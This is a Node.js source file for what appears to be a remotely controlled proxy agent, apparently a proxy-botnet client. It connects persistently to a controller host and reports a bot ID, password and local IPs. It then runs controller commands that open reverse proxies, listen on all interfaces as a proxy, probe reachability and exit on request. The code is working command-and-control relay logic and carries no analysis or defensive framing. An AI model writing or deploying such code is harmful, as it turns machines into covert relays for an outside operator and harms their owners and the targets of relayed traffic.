'use strict';

const ReverseProxyBack = require('./reverseProxyBack');
const ReverseProxyFront = require('./reverseProxyFront');
const Proxy = require('./proxy');
const Utils = require('./utils');
const http = require('http');
const assert = require('assert');
const net = require('net');
const Connection = require('./connection');
const Promise = require('../modules/bluebird');
const config = require('./config');


class Home {
  static init() {
    this._msgQueue = [];
    this._ips = Utils.getIPS();
    this._connect();
    this._msgHandler = {
      'die': this._handleDie.bind(this),
      'findExternalIP': this._findExternalIP.bind(this),
      'findIPInfo': this._findIPInfo.bind(this),
      'canReach': this._canReach.bind(this),
      //      'listen': this._listen.bind(this),
      //      'createForwardProxy': this._createForwardProxy.bind(this),
      //      'checkIfOpen': this._checkIfOpen.bind(this),
      'allowReverseConnection': this._allowReverseCon.bind(this),
      'createReverseProxy': this._createReverseProxy.bind(this),
      'listenToAllInterfaces': this._listenToAllInterfaces.bind(this),
      'storeForwardProxy': this._storeForwardProxy.bind(this)
    };
  }

  static _findIPInfo(msg) {
    const ip = msg.ip;
    assert(this._ips.indexOf(ip) !== -1);
    const resp = {
      respID: msg.id
    };

    Utils.findIPInfoAsync(ip)
      .then(info => {
        resp.ipinfo = info;
	resp.asd = 'sdsd';
      })
      .catch(err => {
        resp.err = err;
	resp.asd = '123';
      })
      .finally(() => {
	this.sendMsg(resp);
      });
  }

  static _findExternalIP(msg) {
    const ip = msg.ip;
    assert(ip);
    assert(this._ips.indexOf(ip) !== -1);
    const resp = {
      respID: msg.id
    };
    Utils.findExternalIPAsync(ip)
      .then(ip => {
        assert(ip);
        resp.ip = ip;
      })
      .catch(err => {
        resp.err = err.toJSON();
      })
      .finally(() => {
        console.log(resp);
        this.sendMsg(resp);
      });
  }

  static _allowReverseCon(msg) {
    const bindIP = msg.bindIP;
    const peerIP = msg.ip;
    const resp = {
      respID: msg.id
    };

    let rpf = ReverseProxyFront.find(bindIP, peerIP);
    if (!rpf) {
      rpf = new ReverseProxyFront(bindIP, peerIP);
    }
    rpf.listenAsync()
      .then(port => {
        resp.port = port;
      })
      .catch(err => {
        resp.err = err;
      })
      .finally(() => {
        this.sendMsg(resp);
      });

  }

  static _canReach(msg) {
    const ip = config.globals.host;
    const port = msg.port;
    const bindIP = msg.bindIP;
    Utils.canConnectFrom(bindIP, ip, port, (err, success) => {
      assert(!err);
      const resp = {
        respID: msg.id,
        success: success
      };
      this.sendMsg(resp);
    });
  }

  static _checkIfOpen(msg) {
    const addrs = msg.addrs;
    // todo: make it work for many addrs
    assert(addrs);
    assert(addrs.length === 1);
    const addr = addrs[0];
    const ip = addr.ip;
    const port = addr.port;
    Utils.canConnect(ip, port, (err, success) => {
      assert(!err);
      const resp = {
        respID: msg.id,
        success: success
      };
      this.sendMsg(resp);
    });
  }

  static _createReverseProxy(msg) {
    const ip = msg.ip;
    const peerIP = msg.reverseIP;
    const peerPort = msg.reversePort;

    const resp = {
      respID: msg.id
    };
    let rpb = ReverseProxyBack.find(ip, peerIP, peerPort);
    if (!rpb) {
      rpb = new ReverseProxyBack(ip, peerIP, peerPort);
    }
    rpb.isUpAsync()
      .then(success => {
        resp.success = success;
        if (!success) {
          rpb.delete();
        }
      })
      .finally(() => {
        this.sendMsg(resp);
      });

  }

  static _listenToAllInterfaces(msg) {
    const port = msg.port;
    const resp = {
      respID: msg.id
    };

    const ip = '0.0.0.0';
    let p = Proxy.find(ip, msg.port);
    if (!p) {
      p = new Proxy(ip, msg.port);
    }
    p.listenAsync()
      .then(port => {
        resp.port = port;
        assert(resp.port);
      })
      .catch(err => {
        resp.err = err;
      })
      .finally(() => {
        console.log('sending');
        console.log(resp);
        this.sendMsg(resp);
      });
  }

  static _storeForwardProxy(msg) {
    const port = msg.port;
    const ip = msg.ip;          // todo: assert ip exists
    const proxyID = msg.proxyID;
    const externalIP = msg.externalIP;

    assert(externalIP);
    assert(ip);

    Proxy.setIPPair(externalIP, ip);

    const resp = {
      respID: msg.id,
      success: true
    };

    process.nextTick(() => {
      this.sendMsg(resp);
    });

  }

  static _createForwardProxy(msg) {
    const port = msg.port;
    const resp = {
      respID: msg.id
    };

    const ip = '0.0.0.0';
    const p = new Proxy(ip, msg.port);
    p.listenAsync()
      .then(port => {
        resp.port = port;
        assert(resp.port);
      })
      .catch(err => {
        resp.err = err;
      })
      .finally(() => {
        console.log('sending');
        console.log(resp);
        this.sendMsg(resp);
      });
  }

  static _listen(msg) {
    const ip = msg.ip;
    const port = msg.port;
    const resp = {
      respID: msg.id
    };
    new Proxy(ip, port, err => {
      if (err) {
        resp.err = err;
      }
      this.sendMsg(resp);
    });
  }

  static _handleDie(msg) {
    if (this._con) {
      this._con.die();
    }
    process.exit(0);
  }

  static sendDebugMsg(msg) {
    assert(!msg.type);
    msg.type = 'debug';
    this.sendMsg(msg);
  }

  static sendMsg(msg, cb) {
    if (this._con) {
      this._con.sendMsg(msg, cb);
      return;
    }
    this._msgQueue.push({
      msg: msg,
      cb: cb
    });
  }

  static _onConnect(sock) {
    assert(sock.remoteAddress);
    this._con = new Connection(sock);
    this._con.sendMsg({
      type: 'hello',
      ips: this._ips,
      hasDNS: config.globals.hasDNS,
      botID: config.globals.botID,
      pass: config.pass,
      version: config.globals.version,
      rand: config.globals.rand,
      bdate: config.globals.bdate
    });

    this._con.setKeepAlive(20); // todo: +- random ?
    for (let i = 0; i < this._msgQueue.length; i++) {
      const {msg, cb} = this._msgQueue[i];
      this._con.sendMsg(msg, cb);
    }
    this._msgQueue = [];
    for (let key in this._msgHandler) {
      if (this._msgHandler.hasOwnProperty(key)) {
        const val = this._msgHandler[key];
        console.log(key);
        console.log(val);
        this._con.setMsgHandler(key, val);
      }
    }
  }

  static _connect(cb = Function.prototype) {
    console.log('connecting');
    assert(!this._con || !this._con.isAlive());
    const sock = net.connect(config.globals.port, config.globals.host, () => {
      console.log('connected');
      sock.removeListener('close', onCanNotConnect);
      sock.removeListener('timeout', onTimeoutBeforeConnect);

      sock.on('close', () => {
        console.log('closed');
        this._con = null;
        console.log('closed');
        setTimeout(() => {
          this._connect(cb);
        }, 1000);
      });
      this._onConnect(sock);
      cb();
    });

    sock.on('close', onCanNotConnect);

    sock.on('error', err => {
      console.log('error');
      console.log(err);
    });

    sock.setTimeout(10 * 1000, onTimeoutBeforeConnect);

    function onTimeoutBeforeConnect() {
      sock.destroy();
    }
    const me = this;
    function onCanNotConnect() {
      setTimeout(() => {
        console.log('can not connect');
        me._connect(cb);
      }, 1000);
    }
  }
};


module.exports = Home;
